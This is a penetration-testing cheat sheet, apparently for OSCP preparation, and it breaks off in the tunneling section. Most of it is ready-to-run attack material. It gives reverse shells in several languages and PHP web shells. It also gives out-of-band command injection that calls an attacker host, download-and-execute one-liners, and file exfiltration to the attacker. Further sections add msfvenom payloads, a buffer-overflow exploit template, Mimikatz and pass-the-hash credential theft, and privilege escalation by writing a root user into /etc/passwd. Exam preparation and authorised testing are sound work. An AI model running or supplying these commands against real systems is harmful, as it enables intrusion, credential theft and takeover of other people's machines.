🔍 Recon & Scanning
Nmap
# Quick port discovery
nmap -p- --min-rate 5000 -T4 <IP> -oN ports.txt

# Full scan on discovered ports
nmap -p 22,80,443 -sV -sC -oA full <IP>

# All in one aggressive
nmap -A -p- <IP> -oA allports

# UDP (top 20)
nmap -sU --top-ports 20 <IP>

# Specific scripts
nmap -p 445 --script smb-vuln* <IP>
nmap -p 80 --script http-enum,http-headers <IP>
nmap --script vuln <IP>
# Ping sweep
nmap -sn 192.168.1.0/24

# No ping (common for firewalled hosts)
nmap -Pn -p- --min-rate 5000 <IP>

# Save all formats
nmap -sV -sC -p- -oA scan_<IP> <IP>
RustScan
# Fast port scan, pass to nmap
rustscan -a <IP> -- -sV -sC
rustscan -a <IP> -r 1-65535 -- -A
rustscan -a <IP> --ulimit 5000 -- -sV -sC
AutoRecon
autorecon <IP>
autorecon <IP> --only-scans-dir
autorecon 192.168.1.0/24  # subnet
Host Discovery
netdiscover -r 192.168.1.0/24
arp-scan -l
fping -a -g 192.168.1.0/24 2>/dev/null
for i in $(seq 1 254); do ping -c1 -W1 192.168.1.$i & done | grep "64 bytes"
🔌 Service Enumeration
HTTP / HTTPS (80, 443, 8080, 8443)
# Directory / file bruteforce
gobuster dir -u http://<IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,bak -t 50 -o gobuster.txt
feroxbuster -u http://<IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html --depth 3
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<IP>/FUZZ -mc 200,301,302,403

# Virtual host / subdomain fuzzing
gobuster vhost -u http://<IP> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://<IP> -H "Host: FUZZ.domain.htb" -mc 200

# Nikto
nikto -h http://<IP>

# curl
curl -v http://<IP>
curl -I http://<IP>                  # headers only
curl -s http://<IP>/robots.txt
curl -k https://<IP>               # skip TLS certificate verification
SMB (139, 445)
# Enumeration
enum4linux -a <IP>
enum4linux-ng -A <IP>
nmap -p 445 --script smb-enum-shares,smb-enum-users,smb-os-discovery <IP>
smbmap -H <IP>
smbmap -H <IP> -u 'user' -p 'pass'
crackmapexec smb <IP>
crackmapexec smb <IP> -u user -p pass --shares

# List shares (null session)
smbclient -L //<IP> -N

# Connect to share
smbclient //<IP>/share -N
smbclient //<IP>/share -U user

# Common smbclient commands
#   ls, cd, pwd, get <file>, put <file>, mget *, recurse ON, prompt OFF

# Mount share
mount -t cifs //<IP>/share /mnt/smb -o username=user,password=pass
FTP (21)
ftp <IP>
# Try: anonymous / anonymous  OR  anonymous / (blank)
nmap -p 21 --script ftp-anon,ftp-bounce,ftp-syst <IP>

# Binary mode for exe/zip transfers:
#   ftp> binary
#   ftp> get file.exe
SSH (22)
ssh user@<IP>
ssh user@<IP> -i id_rsa
ssh user@<IP> -p 2222
# Skip host key verification (gives up the known_hosts protection against a spoofed host for this connection)
ssh -o StrictHostKeyChecking=no user@<IP>
# Generate key pair
ssh-keygen -t rsa -b 4096 -f id_rsa
# Fix permissions on private key
chmod 600 id_rsa
SNMP (161/UDP)
# Community string brute force
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <IP>

# Walk MIB tree
snmpwalk -c public -v1 <IP>
snmpwalk -c public -v2c <IP>
snmpwalk -c public -v1 <IP> 1.3.6.1.4.1.77.1.2.25   # users
snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.4.2.1.2  # processes

snmp-check <IP>
LDAP (389, 636)
# Null / anonymous bind
ldapsearch -x -H ldap://<IP> -b "dc=domain,dc=com"
ldapsearch -x -H ldap://<IP> -b "" -s base

# Authenticated
ldapsearch -x -H ldap://<IP> -b "dc=domain,dc=com" -D "user@domain.com" -w password

# Domain dump
ldapdomaindump -u 'domain\user' -p 'pass' <IP>
ldapdomaindump -u 'domain\user' -p 'pass' <IP> -o /tmp/ldd
NFS (2049)
showmount -e <IP>
mount -t nfs <IP>:/share /mnt/nfs -nolock
mount -t nfs -o vers=2 <IP>:/share /mnt/nfs  # force v2
# Check /etc/exports for no_root_squash (see Linux PrivEsc)
RDP (3389)
xfreerdp /u:user /p:pass /v:<IP>
xfreerdp /u:user /p:pass /v:<IP> /drive:share,/tmp  # mount local dir
xfreerdp /u:user /p:'' /v:<IP> +clipboard
rdesktop <IP> -u user -p pass
MySQL (3306)
mysql -u root -p -h <IP>
mysql -u root --password='' -h <IP>

# Useful SQL commands:
# show databases;   use <db>;   show tables;   select * from <table>;   describe <table>;

# Read files via SQLi
# SELECT LOAD_FILE('/etc/passwd');
# SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
MSSQL (1433)
impacket-mssqlclient user:pass@<IP>
impacket-mssqlclient domain/user:pass@<IP> -windows-auth
sqsh -S <IP> -U user -P pass
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell <IP>

# Enable xp_cmdshell (in mssqlclient)
# EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
# EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
# EXEC xp_cmdshell 'whoami';
WinRM (5985, 5986)
evil-winrm -i <IP> -u user -p pass
evil-winrm -i <IP> -u user -H NTLMHASH
evil-winrm -i <IP> -u user -p pass -S  # HTTPS
crackmapexec winrm <IP> -u user -p pass
SMTP (25, 587)
nmap -p 25 --script smtp-commands,smtp-enum-users <IP>
telnet <IP> 25
# VRFY user  (user enumeration)
# EXPN list  (mailing list expansion)
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t <IP>
🌐 Web Attacks
LFI / Path Traversal
# Basic
http://<IP>/page.php?file=/etc/passwd
http://<IP>/page.php?file=../../../../etc/passwd
http://<IP>/page.php?file=....//....//....//etc/passwd  # bypass filter
http://<IP>/page.php?file=%2fetc%2fpasswd              # URL encoded

# PHP filter (read source)
http://<IP>/page.php?file=php://filter/convert.base64-encode/resource=index.php

# RCE via data:// wrapper
http://<IP>/page.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
# (the base64 is: <?php system($_GET['cmd']); ?>)

# Log poisoning → RCE
curl -A "<?php system(\$_GET['cmd']); ?>" http://<IP>/
http://<IP>/page.php?file=/var/log/apache2/access.log&cmd=whoami
# Other log locations: /var/log/nginx/access.log, /var/log/auth.log
# Also try: /proc/self/environ, /var/mail/www-data

# Windows
http://<IP>/page.php?file=C:\Windows\win.ini
http://<IP>/page.php?file=..\..\..\..\windows\win.ini
SQL Injection
# Test strings
'
''
' OR '1'='1
' OR 1=1--
" OR 1=1--
admin'--
admin' #
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--

# Determine number of columns
' ORDER BY 1--    ' ORDER BY 2--    ' ORDER BY 3-- ...  # until error

# SQLMap
sqlmap -u "http://<IP>/page.php?id=1" --dbs
sqlmap -u "http://<IP>/page.php?id=1" -D database --tables
sqlmap -u "http://<IP>/page.php?id=1" -D database -T users --dump
sqlmap -u "http://<IP>/page.php?id=1" --os-shell
sqlmap -u "http://<IP>/login.php" --data="user=admin&pass=test" --dbs
sqlmap -u "http://<IP>/page.php?id=1" --level=5 --risk=3
# Crawl and test
sqlmap -u "http://<IP>/" --crawl=2 --dbs
File Upload Bypass
# Extension tricks
shell.php  →  shell.php5  shell.phtml  shell.pHp  shell.PhP

# Double extension
shell.jpg.php    shell.php.jpg  (depends on config)

# Null byte (old PHP < 5.3)
shell.php%00.jpg

# Change Content-Type header to:
image/jpeg    image/gif    image/png

# Add magic bytes to start of PHP file
GIF89a;
<?php system($_GET['cmd']); ?>

# .htaccess upload (if Apache)
# Content: AddType application/x-httpd-php .jpg

# Web shell one-liners
<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<?php passthru($_GET['cmd']); ?>
Command Injection
# Injection characters
;whoami
|whoami
||whoami
&whoami
&&whoami
`whoami`
$(whoami)
%0awhoami         # newline

# Blind (time-based)
; sleep 5
| ping -c 5 127.0.0.1

# Blind (OOB)
; curl http://<attacker>/$(whoami)
; nslookup $(whoami).<attacker>
WordPress
wpscan --url http://<IP> --enumerate ap,at,u
wpscan --url http://<IP> -U users.txt -P /usr/share/wordlists/rockyou.txt
wpscan --url http://<IP> --api-token <token>  # for vuln detection

# Default paths
# /wp-admin  /wp-login.php  /wp-config.php  /xmlrpc.php

# Malicious plugin (if admin access)
# Appearance → Theme Editor → 404.php → add shell
Common Wordlists
| Path | Use |
|---|---|
| /usr/share/wordlists/rockyou.txt | Passwords |
| /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | Dirs (medium) |
| /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt | Dirs (small/fast) |
| /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt | Files + dirs |
| /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt | Subdomains |
| /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt | Usernames |
| /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt | Common passwords |
💀 Shells & Payloads
Tip: Use `rlwrap nc -lvnp 4444` for a better interactive reverse shell experience.
Listeners
nc -lvnp 4444
rlwrap nc -lvnp 4444
socat file:`tty`,raw,echo=0 tcp-listen:4444
Reverse Shells — Linux
# Bash
bash -i >& /dev/tcp/<IP>/4444 0>&1
bash -c 'bash -i >& /dev/tcp/<IP>/4444 0>&1'

# Python 3
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("<IP>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# Python 2
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("<IP>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# Netcat (with -e)
nc -e /bin/sh <IP> 4444

# Netcat (without -e / mkfifo)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> 4444 >/tmp/f

# Perl
perl -e 'use Socket;$i="<IP>";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# PHP (one-liner)
php -r '$sock=fsockopen("<IP>",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# Ruby
ruby -rsocket -e 'f=TCPSocket.open("<IP>",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Reverse Shells — Windows (PowerShell)
# PowerShell TCP reverse shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

# Base64 encoded PowerShell (bypass)
powershell -enc <BASE64>

# PowerShell one-liner download and execute
IEX (New-Object Net.WebClient).DownloadString('http://<IP>:8000/shell.ps1')
PHP Web Shells
<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<?php passthru($_GET['cmd']); ?>
<?php echo `$_GET['cmd']`; ?>
Shell Upgrade (TTY)
# Step 1: spawn PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
script /dev/null -c bash
/usr/bin/script -qc /bin/bash /dev/null

# Step 2: background the shell
Ctrl+Z

# Step 3: fix terminal
stty raw -echo; fg

# Step 4: fix environment
reset
export SHELL=bash
export TERM=xterm-256color
stty rows 50 cols 200

# Alternative: socat (requires socat on target)
# Attacker:
socat file:`tty`,raw,echo=0 tcp-listen:4444
# Target:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:4444
Msfvenom Payloads
# Linux
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f elf -o shell.elf
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f elf -o shell.elf

# Windows
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f exe -o shell32.exe

# Windows DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f dll -o shell.dll

# Web shells
msfvenom -p php/reverse_php LHOST=<IP> LPORT=4444 -f raw -o shell.php
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f asp -o shell.asp
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f aspx -o shell.aspx
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=4444 -f raw -o shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=4444 -f war -o shell.war

# With bad char exclusion
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=4444 -b "\x00\x0a\x0d" EXITFUNC=thread -f c

# List payloads
msfvenom -l payloads | grep shell_reverse
msfvenom -l payloads | grep meterpreter
📦 File Transfers
Attacker — Serve Files
# Python HTTP server
python3 -m http.server 8000
python -m SimpleHTTPServer 8000

# Python HTTPS server
python3 -c "import http.server,ssl;s=http.server.HTTPServer(('',8443),http.server.SimpleHTTPRequestHandler);s.socket=ssl.wrap_socket(s.socket,certfile='/tmp/cert.pem',server_side=True);s.serve_forever()"
# Note: ssl.wrap_socket() was removed in Python 3.12; on newer Pythons use ssl.SSLContext(...).wrap_socket(...) instead

# SMB share (impacket)
impacket-smbserver share . -smb2support
impacket-smbserver share . -smb2support -username user -password pass

# FTP server
python3 -m pyftpdlib -p 21 -w

# Receive files (upload server)
pip install uploadserver
python3 -m uploadserver
Linux Target — Download
wget http://<IP>:8000/file.sh -O /tmp/file.sh
curl http://<IP>:8000/file.sh -o /tmp/file.sh
curl http://<IP>:8000/file.sh | bash

# Netcat
nc -lvnp 4444 < file.sh          # attacker
nc <IP> 4444 > file.sh           # target

# Base64 transfer (pasted through the existing shell; needs no extra network channel)
# Attacker:
base64 -w 0 file.sh; echo
# Target:
echo "<BASE64>" | base64 -d > file.sh

# SCP
scp file.sh user@<target>:/tmp/
scp user@<target>:/tmp/file.sh .
Windows Target — Download
# PowerShell (various methods)
iwr http://<IP>:8000/file.exe -outfile C:\Windows\Temp\file.exe
Invoke-WebRequest -Uri http://<IP>:8000/file.exe -OutFile C:\Windows\Temp\file.exe
(New-Object System.Net.WebClient).DownloadFile('http://<IP>:8000/file.exe','C:\Windows\Temp\file.exe')

# Execute in memory (no disk)
IEX (New-Object Net.WebClient).DownloadString('http://<IP>:8000/shell.ps1')

# certutil
certutil.exe -urlcache -split -f http://<IP>:8000/file.exe C:\Windows\Temp\file.exe

# bitsadmin
bitsadmin /transfer job http://<IP>:8000/file.exe C:\Windows\Temp\file.exe

# SMB copy (after attacker starts smbserver)
copy \\<attacker>\share\file.exe .
net use Z: \\<attacker>\share; copy Z:\file.exe .

# curl (Windows 10+)
curl http://<IP>:8000/file.exe -o C:\Windows\Temp\file.exe

# FTP (batch script)
echo open <IP> 21 > ftp.txt && echo user anonymous >> ftp.txt && echo binary >> ftp.txt && echo get file.exe >> ftp.txt && ftp -v -n -s:ftp.txt
Windows Target — Upload (Exfil)
# To attacker's SMB share
copy C:\Users\user\Desktop\proof.txt \\<attacker>\share\

# PowerShell upload
$b = [System.IO.File]::ReadAllBytes("C:\file.txt"); $e = [System.Convert]::ToBase64String($b); Invoke-WebRequest http://<IP>:8000/upload -Method POST -Body $e

# Netcat
nc.exe <IP> 4444 < file.txt      # target sends
nc -lvnp 4444 > file.txt         # attacker receives
🔑 Password Attacks
Hashcat
| -m | Hash Type |
|---|---|
| 0 | MD5 |
| 100 | SHA-1 |
| 400 | phpBB / WordPress MD5 |
| 500 | md5crypt (Linux shadow) |
| 1000 | NTLM |
| 1800 | sha512crypt (Linux shadow $6$) |
| 3200 | bcrypt $2*$ |
| 5600 | NetNTLMv2 |
| 13100 | Kerberos TGS (Kerberoast) |
| 18200 | Kerberos AS-REP |
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt --show   # show cracked

# Identify hash type
hashcat --identify hash.txt
hash-identifier
haiti <hash>
John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --format=NT hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --show hash.txt

# Convert to john format
ssh2john id_rsa > id_rsa.hash
zip2john file.zip > zip.hash
pdf2john file.pdf > pdf.hash
keepass2john keepass.kdbx > keepass.hash
gpg2john secret.gpg > gpg.hash

john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Hydra — Online Brute Force
# SSH
hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://<IP>
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://<IP> -t 4

# FTP
hydra -l user -P /usr/share/wordlists/rockyou.txt ftp://<IP>

# SMB
hydra -l user -P /usr/share/wordlists/rockyou.txt smb://<IP>

# RDP
hydra -l user -P /usr/share/wordlists/rockyou.txt rdp://<IP>

# HTTP POST form
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"

# HTTP Basic Auth
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> http-get /admin/

# Options: -t 4 (threads), -V (verbose each attempt), -f (stop on first found), -s port
CrackMapExec — Password Spraying
# Spray single password against user list
crackmapexec smb <IP>/24 -u users.txt -p 'Password123' --continue-on-success

# Test credentials
crackmapexec smb <IP> -u user -p pass
crackmapexec smb <IP> -u user -H NTLMHASH

# Dump SAM
crackmapexec smb <IP> -u admin -p pass --sam
crackmapexec smb <IP> -u admin -p pass --lsa
💥 Buffer Overflow (Windows x86)
Note: For OSCP the BoF target is Windows x86 (32-bit). The methodology below assumes Immunity Debugger + mona.py on the target.
Step 1 — Fuzzing
# Simple fuzzer template
# Step 1 fuzzer: open a fresh connection each round and send a run of "A" bytes that
# grows by 100 per round, until any socket operation raises; the length of the buffer
# that failed is printed as the crash point for the later steps.
import socket, time, sys

ip = "<TARGET_IP>"
port = 1337
prefix = "OVERFLOW1 "  # command prefix if needed (sent before the buffer, latin-1 encoded)

buffer = b"A" * 100    # starting length; grows by 100 bytes per round below
while True:
    try:
        s = socket.socket()
        s.connect((ip, port))
        s.recv(1024)   # read the service's initial reply before sending — presumably a banner; confirm the target sends one
        s.send(bytes(prefix, "latin-1") + buffer + b"\r\n")
        s.recv(1024)   # wait for a reply; a service that has died usually fails here or on the next connect
        s.close()
        print(f"Sent {len(buffer)} bytes")
        time.sleep(1)  # one-second pause between rounds
        buffer += b"A" * 100
    except:
        # NOTE(review): a bare except catches everything, including KeyboardInterrupt,
        # so any failure (refused connection, reset, timeout, Ctrl-C) is reported as a crash.
        print(f"Crashed at {len(buffer)} bytes")
        sys.exit()

# Note the crash length, add ~400 for safety
Step 2 — Find EIP Offset
# Generate cyclic pattern (crash_length + 400)
msf-pattern_create -l 2400

# Or from metasploit:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2400

# Send pattern as payload, note EIP value in Immunity, then:
msf-pattern_offset -l 2400 -q <EIP_VALUE>
# → Exact match at offset XXX
Step 3 — Confirm EIP Control
# payload = "A" * offset + "B" * 4 + "C" * (buffer_size - offset - 4)
# EIP in debugger should show 42424242
# Note ESP value and available space for shellcode
Step 4 — Find Bad Characters
# Mona: generate bytearray excluding \x00
!mona bytearray -b "\x00"

# Send all bytes \x01–\xff after EIP control
# Compare memory dump vs bytearray.bin:
!mona compare -f C:\mona\bytearray.bin -a <ESP_ADDRESS>

# Repeat excluding found bad chars until "Unmodified"
!mona bytearray -b "\x00\x0a\x0d"
Step 5 — Find JMP ESP
# List modules (look for no ASLR, no SafeSEH, no DEP)
!mona modules

# Find JMP ESP in clean module
!mona find -s "\xff\xe4" -m module.dll

# Verify opcode
msf-nasm_shell
nasm > jmp esp   # → FFE4

# Note address (e.g., 0x625011AF) - goes in EIP as little-endian
# struct.pack("<I", 0x625011AF)
Step 6 — Generate Shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f python -v payload
Step 7 — Final Exploit Template
# Step 7 skeleton: one connection, one send. The request is
#   prefix + offset bytes of padding + 4-byte return address + 16 NOPs + shellcode + CRLF
# with offset, eip and payload filled in from Steps 2, 5 and 6.
import socket, struct

ip = "<TARGET_IP>"
port = 1337
prefix = "OVERFLOW1 "

offset = 1978                                   # your offset (from msf-pattern_offset in Step 2)
eip = struct.pack("<I", 0x625011AF)            # JMP ESP address, packed as 4-byte little-endian ("<I")
nop_sled = b"\x90" * 16

payload = (                                    # paste msfvenom -f python output here
    b"\xdb\xc0..."                             # placeholder literal, not real shellcode — replace it
)

buffer = b"A" * offset + eip + nop_sled + payload

s = socket.socket()
s.connect((ip, port))
s.recv(1024)                                   # read the initial reply first, as the fuzzer did — presumably a banner
print("Sending payload...")
s.send(bytes(prefix, "latin-1") + buffer + b"\r\n")
s.close()
🐧 Linux Privilege Escalation
Automated Enumeration
# LinPEAS (most thorough)
curl -sL http://<attacker>:8000/linpeas.sh | bash
curl -sL http://<attacker>:8000/linpeas.sh | bash 2>&1 | tee /tmp/lp.txt

# LinEnum
./LinEnum.sh -t

# linux-smart-enumeration
./lse.sh -l2
Manual Basics
id; whoami; hostname; uname -a; cat /etc/issue; cat /proc/version
cat /etc/passwd | grep -v nologin
cat /etc/shadow   # if readable → crack with john/hashcat
sudo -l           # check sudo rights
history; cat ~/.bash_history
env; cat /etc/environment
ls -la /home/     # other users' homes
ls -la /root/ 2>/dev/null
SUID / SGID
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
# Check results against: https://gtfobins.github.io/
Sudo
sudo -l
sudo su -
sudo /bin/bash
sudo -u root /bin/bash
# Check GTFOBins for specific binaries
# e.g. sudo vim → :!/bin/bash
# e.g. sudo find . -exec /bin/sh \;
# e.g. sudo awk 'BEGIN {system("/bin/sh")}'
Cron Jobs
crontab -l
cat /etc/crontab
ls -la /etc/cron.*
ls -la /var/spool/cron/crontabs/

# Watch for new processes (pspy)
./pspy64   # download from github

# If cron runs writable script as root:
echo 'bash -i >& /dev/tcp/<IP>/4444 0>&1' >> /path/to/script.sh
Capabilities
getcap -r / 2>/dev/null

# cap_setuid+ep examples:
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
/usr/bin/ruby -e 'Process::Sys.setuid(0); exec "/bin/bash"'
Writable Files & /etc/passwd
find / -writable -type f 2>/dev/null | grep -v proc | grep -v sys
find /etc -writable 2>/dev/null

# If /etc/passwd is writable → add root user
openssl passwd -1 -salt hacker password123
echo 'hacker:$1$hacker$HASH:0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker
PATH Hijacking
# Find SUID binary that calls commands without full path
strings /usr/local/bin/suid_binary | grep -v '/'

# Create malicious command in /tmp
echo '#!/bin/bash\nbash -i >& /dev/tcp/<IP>/4444 0>&1' > /tmp/service
chmod +x /tmp/service
export PATH=/tmp:$PATH
/usr/local/bin/suid_binary
NFS No_Root_Squash
# Target: check exports
cat /etc/exports
# Look for no_root_squash on a share

# Attacker: mount, create SUID bash
showmount -e <IP>
mount -t nfs <IP>:/share /mnt/nfs -nolock
cp /bin/bash /mnt/nfs/
chmod u+s /mnt/nfs/bash

# Target:
/share/bash -p
Password Hunting
grep -r "password\|passwd\|secret\|PASS" /var/www/html/ 2>/dev/null
find / -name "config.php" -o -name ".env" -o -name "settings.py" 2>/dev/null | xargs grep -l "pass" 2>/dev/null
find / -name "*.conf" 2>/dev/null | xargs grep -l "password" 2>/dev/null
history | grep -i pass
🪟 Windows Privilege Escalation
Automated Enumeration
# WinPEAS
.\winpeas.exe
.\winpeas.bat

# PowerUp (PowerSploit)
powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks"

# Seatbelt
.\Seatbelt.exe -group=all

# PrivescCheck
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
Manual Basics
whoami /all
systeminfo
hostname
net user
net user <username>
net localgroup administrators
ipconfig /all
route print
netstat -ano
tasklist /svc
wmic product get name,version    # installed software
wmic service list brief
reg query HKLM\SYSTEM\CurrentControlSet\Services
Token Impersonation High Value
whoami /priv
# Look for: SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege

# PrintSpoofer (Windows 10 / Server 2019+)
.\PrintSpoofer.exe -i -c cmd.exe
.\PrintSpoofer.exe -c "nc.exe <IP> 4444 -e cmd"

# GodPotato (modern all-in-one)
.\GodPotato.exe -cmd "cmd /c whoami"
.\GodPotato.exe -cmd "nc.exe <IP> 4444 -e cmd.exe"

# JuicyPotato (Server 2008-2016, Windows 7-8)
.\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c nc.exe <IP> 4444 -e cmd.exe" -t *

# SweetPotato
.\SweetPotato.exe -p cmd.exe -a "/c nc.exe <IP> 4444 -e cmd.exe"
Unquoted Service Paths
# Find unquoted paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v '"'
sc qc <servicename>

# If path is: C:\Program Files\Service Folder\service.exe
# Place malicious exe at: C:\Program.exe  OR  C:\Program Files\Service.exe
# Then restart service:
sc stop <service>
sc start <service>
net stop <service> && net start <service>
Weak Service Permissions
# Check permissions
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
.\accesschk.exe /accepteula -ucqv <servicename>

# If SERVICE_CHANGE_CONFIG: replace binary path
sc config <service> binpath= "C:\Windows\Temp\shell.exe"
sc stop <service>
sc start <service>
AlwaysInstallElevated
# Check registry (both must be 1)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f msi -o evil.msi
msiexec /quiet /qn /i evil.msi
Registry Autoruns
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

# Check write permissions on autorun binary
.\accesschk.exe /accepteula -wvu "C:\path\to\autorun.exe"
# If writable, replace with malicious binary
Stored Credentials
cmdkey /list
runas /savecred /user:admin cmd.exe

# Registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"   # autologon

# Unattend files
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattended.xml
type C:\Windows\System32\sysprep\sysprep.xml

# Search for passwords
findstr /si password *.txt *.ini *.config *.xml *.ps1 *.bat
Pass-the-Hash
# Dump hashes (as admin/SYSTEM)
# Mimikatz:
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
lsadump::sam

# Impacket
impacket-secretsdump <domain>/user:pass@<IP>
impacket-secretsdump -sam SAM -system SYSTEM LOCAL

# Use hash for auth
impacket-psexec -hashes :NTLM administrator@<IP>
evil-winrm -i <IP> -u administrator -H NTLMHASH
crackmapexec smb <IP> -u administrator -H NTLMHASH
🚇 Tunneling & Pivoting
SSH Tunneling
# Local port forward: access remote service through attacker
# localhost:8080 → pivot:80 → internal:80
ssh -L 8080:<internal_IP>:80 user@<pivot_IP>
ssh -L 8080:127.0.0.1:80 user@<pivot_IP>   # pivot's localhost

# Remote port forward: expose attacker port through target
ssh -R 4444:127.0.0.1:4444 user@<pivot_IP>

# Dynamic SOCKS proxy (attacker creates SOCKS5 on 1080)
ssh -D 1080 user@<pivot_IP> -N -f
# Then proxychains uses socks5 127.0.0.1 1080

# Jump host
ssh -J user@jump_host target_user@<target_IP>

# Keep alive / no TTY
ssh -N -f user@<IP> -L 8080:127.0.0.1:80
Chisel
# ── REVERSE SOCKS (most common) ──
# Attacker (server):
./chisel server -p 8000 --reverse

# Target (client):
./chisel client <attacker_IP>:8000 R:socks
# → SOCKS5 proxy on attacker at 127.0.0.1:1080

# ── REVERSE PORT FORWARD ──
./chisel client <attacker_IP>:8000 R:9090:<internal_IP>:80
# → attacker:9090 → internal:80

# ── FORWARD SOCKS (if you can reach target directly) ──
# Target:
./chisel server -p 8000 --socks5
# Attacker:
./chisel client <target_IP>:8000 socks
Ligolo-ng
# Attacker: start proxy
sudo ip tuntap add user $USER mode tun ligolo
sudo ip link set ligolo up
./proxy -selfcert -laddr 0.0.0.0:11601

# Target: run agent
./agent -connect <attacker_IP>:11601 -ignore-cert

# Attacker (in ligolo-ng console):
session                             # select session
start                               # start tunnel

# Add route to internal network
